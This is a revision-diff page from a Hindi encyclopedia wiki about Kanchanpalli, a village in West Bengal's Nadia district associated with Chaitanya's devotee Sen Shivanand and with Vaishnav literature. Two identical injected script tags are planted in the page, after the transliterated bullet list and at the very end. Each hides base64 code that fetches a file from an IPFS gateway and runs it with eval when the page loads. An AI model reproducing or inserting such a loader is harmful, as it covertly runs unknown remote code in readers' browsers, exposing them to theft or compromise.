Difference between revisions of "कंचनपल्ली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
{{पुनरीक्षण}}
+
*कंचनपल्ली [[पश्चिम बंगाल]] राज्य के नादिया ज़िले में स्थित है।  
कंचनपल्ली [[पश्चिम बंगाल]] राज्य के नादिया ज़िले में स्थित है। [[कल्याणी कर्नाटक|कल्याणी]] से कई मील दूर [[चैतन्य महाप्रभु]] के भक्त तथा उनके समकालीन सेन शिवानंद<ref>जिन्हें चैतन्य ने कविकर्णपूर की उपाधि दी थी</ref> का निवास स्थान है। कहते हैं चैतन्य इस स्थान पर शिवानंद से मिलने आए थे। शिवानंद तीन प्रसिद्ध ग्रंथों के लेखक थे- चैतन्यचरितामृतकाव्य, चैतन्य-चंद्रोदय नाटक और गौरांगोद्देश्य दोपिका। इन्हीं के प्रभाव से 15वीं शती में कंचनपल्ली में [[वैष्णव]] [[साहित्य]] का प्रसिद्ध केन्द्र बन गया था। जनश्रुति के अनुसार कंचनपल्ली का मूलनाम नरहट्टग्राम था। कंचनपल्ली [[पश्चिम बंगाल|बंगाल]] के ख्यातनामा विद्वान नीमचंद्र शिरोमणि और [[तुलसीदास|तुलसी]]-[[रामायण]] के [[बंगाली भाषा|बंगाली]] अनुवादक हरिमोहन गुप्त का भी जन्मस्थान है।  
+
*[[कल्याणी कर्नाटक|कल्याणी]] से कई मील दूर [[चैतन्य महाप्रभु]] के भक्त तथा उनके समकालीन सेन शिवानंद<ref>जिन्हें चैतन्य ने कविकर्णपूर की उपाधि दी थी</ref> का निवास स्थान है।  
 +
*कहते हैं चैतन्य इस स्थान पर शिवानंद से मिलने आए थे।  
 +
*शिवानंद तीन प्रसिद्ध ग्रंथों के लेखक थे- चैतन्यचरितामृतकाव्य, चैतन्य-चंद्रोदय नाटक और गौरांगोद्देश्य दोपिका।  
 +
*इन्हीं के प्रभाव से 15वीं शती में कंचनपल्ली में [[वैष्णव]] [[साहित्य]] का प्रसिद्ध केन्द्र बन गया था।  
 +
*जनश्रुति के अनुसार कंचनपल्ली का मूलनाम नरहट्टग्राम था।  
 +
*कंचनपल्ली [[पश्चिम बंगाल|बंगाल]] के ख्यातनामा विद्वान नीमचंद्र शिरोमणि और [[तुलसीदास|तुलसी]]-[[रामायण]] के [[बंगाली भाषा|बंगाली]] अनुवादक हरिमोहन गुप्त का भी जन्मस्थान है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 12: Line 17:
 
[[Category:पश्चिम बंगाल के ऐतिहासिक स्थान]]
 
[[Category:पश्चिम बंगाल के ऐतिहासिक स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
+
 
 
__INDEX__
 
__INDEX__

Revision as of 08:04, 20 August 2011

  • kanchanapalli pashchim bangal rajy ke nadiya zile mean sthit hai.
  • kalyani se kee mil door chaitany mahaprabhu ke bhakt tatha unake samakalin sen shivanand[1] ka nivas sthan hai.
  • kahate haian chaitany is sthan par shivanand se milane ae the.
  • shivanand tin prasiddh granthoan ke lekhak the- chaitanyacharitamritakavy, chaitany-chandroday natak aur gauraangoddeshy dopika.
  • inhian ke prabhav se 15vian shati mean kanchanapalli mean vaishnav sahity ka prasiddh kendr ban gaya tha.
  • janashruti ke anusar kanchanapalli ka moolanam narahattagram tha.
  • kanchanapalli bangal ke khyatanama vidvan nimachandr shiromani aur tulasi-ramayan ke bangali anuvadak harimohan gupt ka bhi janmasthan hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. jinhean chaitany ne kavikarnapoor ki upadhi di thi

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>